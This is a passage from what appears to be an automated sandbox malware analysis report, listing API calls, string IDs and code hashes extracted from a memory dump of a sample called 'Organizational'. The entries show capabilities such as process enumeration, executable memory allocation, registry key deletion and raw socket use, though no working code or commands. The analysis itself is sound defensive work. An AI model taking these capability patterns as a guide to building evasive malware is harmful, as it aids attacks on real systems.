                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 3b6a55a0ddecb97dd3b1875feb3d80a587f033e1a4f6321b5bb60a867856dd38
                                                    • Instruction ID: 263c62e575b98a025bd301dfe338d9783dca5ab610f5a173ea3d5de2af65f42f
                                                    • Opcode Fuzzy Hash: 3b6a55a0ddecb97dd3b1875feb3d80a587f033e1a4f6321b5bb60a867856dd38
                                                    • Instruction Fuzzy Hash: B921F532614208BFDF529F54CC85FBF37AAEF89764F00C125F9149B190DA71AC11ABA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F3027A,?), ref: 00F6C6E7
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F6C6F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: c1d65677dc73bade11dacbfcd2cac42d9dbeb266fe4d37cd180d801f1e54b9f8
                                                    • Instruction ID: 6d2069b0254ae0e99f4f865030db1b912378c72ad9374bceb64de0b11d412e63
                                                    • Opcode Fuzzy Hash: c1d65677dc73bade11dacbfcd2cac42d9dbeb266fe4d37cd180d801f1e54b9f8
                                                    • Instruction Fuzzy Hash: D3E0C2B8A007138FD7205B25CC4DBA276D4FF04724BC0842AE8C5C2210DB70C840AF50
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04AF7,?), ref: 00F04BB8
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04BCA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: bf461c163b3ebf9efb7742efc3b10e3902c90756795b9022bc9a88b2c68453b0
                                                    • Instruction ID: 8264a52cb3c425a6e18645077b53283d3d51da8fadcf2dd0631c09ff63076461
                                                    • Opcode Fuzzy Hash: bf461c163b3ebf9efb7742efc3b10e3902c90756795b9022bc9a88b2c68453b0
                                                    • Instruction Fuzzy Hash: 12D0C7B0800B128FD320AF30DC0CB8672E4AF00360F408C2AD882C2690EE70E880EB12
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04B44,?,00F049D4,?,?,00F027AF,?,00000001), ref: 00F04B85
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04B97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: 5f0e9dfa6cd59b331a4f9740987c4b29fe0dcd4cb0cab8bc1ef8e19a69e4be8c
                                                    • Instruction ID: e45a8e5b3b850d7672357fb4c98b290ec8857971181e0995bb8474f9910d8e8f
                                                    • Opcode Fuzzy Hash: 5f0e9dfa6cd59b331a4f9740987c4b29fe0dcd4cb0cab8bc1ef8e19a69e4be8c
                                                    • Instruction Fuzzy Hash: 7FD012B09147128FD7206F31DC1DB56B6D4AF05765F91882AD485D2590DA70E484F751
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F71696), ref: 00F71455
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F71467
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: 26ae689053c33b9ed4b4688621255b10feedd6cc3f6d8ec8619f73a09b832401
                                                    • Instruction ID: eacfc263406e7784db6072053d48934aca0a517b40b69ec57aac39233dc8febf
                                                    • Opcode Fuzzy Hash: 26ae689053c33b9ed4b4688621255b10feedd6cc3f6d8ec8619f73a09b832401
                                                    • Instruction Fuzzy Hash: D5D01770910B12CFD7209F79CC0D75676E4AF0B7A5B51C82B94DAD2560EA70D8C8EB92
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F05E3D), ref: 00F055FE
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F05610
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 0f8ac9c37f8aaa89fad6f67b3a786374455dc34b75e61e5f057c53b0d09411a5
                                                    • Instruction ID: c0ccf7e8e19210bdc151134b4ac31df8809bb3ed1ffe50604ead9332343bca40
                                                    • Opcode Fuzzy Hash: 0f8ac9c37f8aaa89fad6f67b3a786374455dc34b75e61e5f057c53b0d09411a5
                                                    • Instruction Fuzzy Hash: 2DD0C234810B128FD7605F30C80C29776E4AF00765B85882AD481C2290DAB0C484EB40
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F693DE,?,00F80980), ref: 00F697D8
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F697EA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 5a8023b2b1ff0e3e16477bed433f497bdd001ee829be6815f8f03904e065d5a8
                                                    • Instruction ID: bc08128492db9e55b8e4eda820b0ff5ac87a06c697c155d1857a8fe0e1f77dd4
                                                    • Opcode Fuzzy Hash: 5a8023b2b1ff0e3e16477bed433f497bdd001ee829be6815f8f03904e065d5a8
                                                    • Instruction Fuzzy Hash: 12D012709107138FD7205F31D88D65676D8EF057A1B51882AD485D2250DFB0C484E712
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 565aae2441dfb9fc51792f258a69ddf0e0ef61fad2dd5fb4006c33c90a2666e4
                                                    • Instruction ID: 347d242d75876750bf8643dc7129c530687399b1b789754e5e2773186e335926
                                                    • Opcode Fuzzy Hash: 565aae2441dfb9fc51792f258a69ddf0e0ef61fad2dd5fb4006c33c90a2666e4
                                                    • Instruction Fuzzy Hash: 0EC18F75A10216EFCB14DF98C884EAEBBB5FF48710B118598EC06DB251DB31ED85EB90
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F6E7A7
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F6E7EA
                                                      • Part of subcall function 00F6DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F6DEAE
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F6E9EA
                                                    • _memmove.LIBCMT ref: 00F6E9FD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: b9f3c00fe1352789f5590915de2eaf5ffe34dd91838e93b420337ce53cf7ad0f
                                                    • Instruction ID: 234cac3c40487b1cd351a3bc422b91549ef06e3b2320538fb54972c826072d73
                                                    • Opcode Fuzzy Hash: b9f3c00fe1352789f5590915de2eaf5ffe34dd91838e93b420337ce53cf7ad0f
                                                    • Instruction Fuzzy Hash: E4C16B76A083019FC714DF28C88096ABBE4FF89714F14896DF8999B351D731E946DB82
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F687AD
                                                    • CoUninitialize.OLE32 ref: 00F687B8
                                                      • Part of subcall function 00F7DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00F68A0E,?,00000000), ref: 00F7DF71
                                                    • VariantInit.OLEAUT32(?), ref: 00F687C3
                                                    • VariantClear.OLEAUT32(?), ref: 00F68A94
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: d172dd05ccdb12d49d8df11a7e2d874a5b84d85811cc9dd1e46e2d09bde82ae5
                                                    • Instruction ID: b4961de77af8ed0c4c566fb5c4ff8008b241bcfc3b0e0ee8c3d9b612d9c7799c
                                                    • Opcode Fuzzy Hash: d172dd05ccdb12d49d8df11a7e2d874a5b84d85811cc9dd1e46e2d09bde82ae5
                                                    • Instruction Fuzzy Hash: B1A17A75604B059FC710DF64C881B2AB7E4BF88360F04894DFA95AB3A2CB34ED45DB92
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F83C4C,?), ref: 00F48308
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F83C4C,?), ref: 00F48320
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00F80988,000000FF,?,00000000,00000800,00000000,?,00F83C4C,?), ref: 00F48345
                                                    • _memcmp.LIBCMT ref: 00F48366
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    • Opcode ID: 1886d459d2b279f618e71901546598f6ef2a5e61a55f39acf6a10e23224265e0
                                                    • Instruction ID: a017741b818d0f5c6ef8b110a8c6d171746de4984a22a5a95be9dbd5807c3604
                                                    • Opcode Fuzzy Hash: 1886d459d2b279f618e71901546598f6ef2a5e61a55f39acf6a10e23224265e0
                                                    • Instruction Fuzzy Hash: 7B812971A00109EFCB04DF94C984EEEBBB9FF89715F244558E906AB250DB71AE06DB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 8496f96b9dd044766298acde671e64fc05ede13806dfe28634674b5f07b2d4a8
                                                    • Instruction ID: 71d184251ce1351625edd93162806cc965978489cd0ef7c874128ccf611406be
                                                    • Opcode Fuzzy Hash: 8496f96b9dd044766298acde671e64fc05ede13806dfe28634674b5f07b2d4a8
                                                    • Instruction Fuzzy Hash: D551C7316087059FDB20BF799C95B7DBBE6AF44310B20981FE946DB2A1EF749880A705
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F6F526
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F6F534
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F6F5F4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F6F603
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: 3c08329074e0604211619291f54066c49861cfb2b1e328d421a0cf6a114c75e3
                                                    • Instruction ID: dfd486ba147704903294e57c453e136f2cefdf90404c637ab8f8bacfb658c999
                                                    • Opcode Fuzzy Hash: 3c08329074e0604211619291f54066c49861cfb2b1e328d421a0cf6a114c75e3
                                                    • Instruction Fuzzy Hash: B7517CB1504315AFD310EF20DC86EABB7E8FF94710F40492DF595972A1EB74A908DB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                    • Instruction ID: 62e90a0ae6989e9b2fd3adcf46092a24103a9395104fa7805bf339e4c6fbc72c
                                                    • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                    • Instruction Fuzzy Hash: B441A431A0070A9BDB28CE69C8909EF77A6AFC5360B24813DE85987640D779BDC1AB44
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F4A68A
                                                    • __itow.LIBCMT ref: 00F4A6BB
                                                      • Part of subcall function 00F4A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F4A976
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F4A724
                                                    • __itow.LIBCMT ref: 00F4A77B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: 85c1d56637ac7655ac72f66c6c8d27b9dc2bdffde51a2ecf2985d2b5242ad17f
                                                    • Instruction ID: ff5c6afb24e68e66d8bc2fcfee5570ef239ca7cc6ee48b0f59011e8375d82d19
                                                    • Opcode Fuzzy Hash: 85c1d56637ac7655ac72f66c6c8d27b9dc2bdffde51a2ecf2985d2b5242ad17f
                                                    • Instruction Fuzzy Hash: 9D416F74A40209AFDF21EF54CC56BEE7FB9AF48760F040069FD05A3291DB749944EBA2
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F670BC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F670CC
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F67130
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F6713C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: 1352745c6bee9b362acb507adbc48c4ebf8920d86f10aa94f655db353d92d739
                                                    • Instruction ID: acb31b24e45d788378ba20823bdbd6706097a3521c6a273c8075fca98c352444
                                                    • Opcode Fuzzy Hash: 1352745c6bee9b362acb507adbc48c4ebf8920d86f10aa94f655db353d92d739
                                                    • Instruction Fuzzy Hash: CD418EB57402046FEB20BF24DC86F7A77E89B04B14F048558FB59AB3D2DB759D009B91
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F80980), ref: 00F66B92
                                                    • _strlen.LIBCMT ref: 00F66BC4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: 22694080d51305944aba13f75ca6b516d28fb73eb23fac47d9d16fb2bab538ff
                                                    • Instruction ID: 84d14ad82a1dedb0e80050d5586490847635f62ad09c8563d8194e767b7e452b
                                                    • Opcode Fuzzy Hash: 22694080d51305944aba13f75ca6b516d28fb73eb23fac47d9d16fb2bab538ff
                                                    • Instruction Fuzzy Hash: 6741C272A00508ABCB14FB64CC81EBEB3A9EF54310F148154F91AE72D2DF34AD41E750
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F78F03
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 1f2c51575d134f52cba0ca476d6ec65fe3856510255619c1be1b1447a911a053
                                                    • Instruction ID: 7a62800478e30d549bac82187196b32390f0d3b63f39541432b6983d0d31ab04
                                                    • Opcode Fuzzy Hash: 1f2c51575d134f52cba0ca476d6ec65fe3856510255619c1be1b1447a911a053
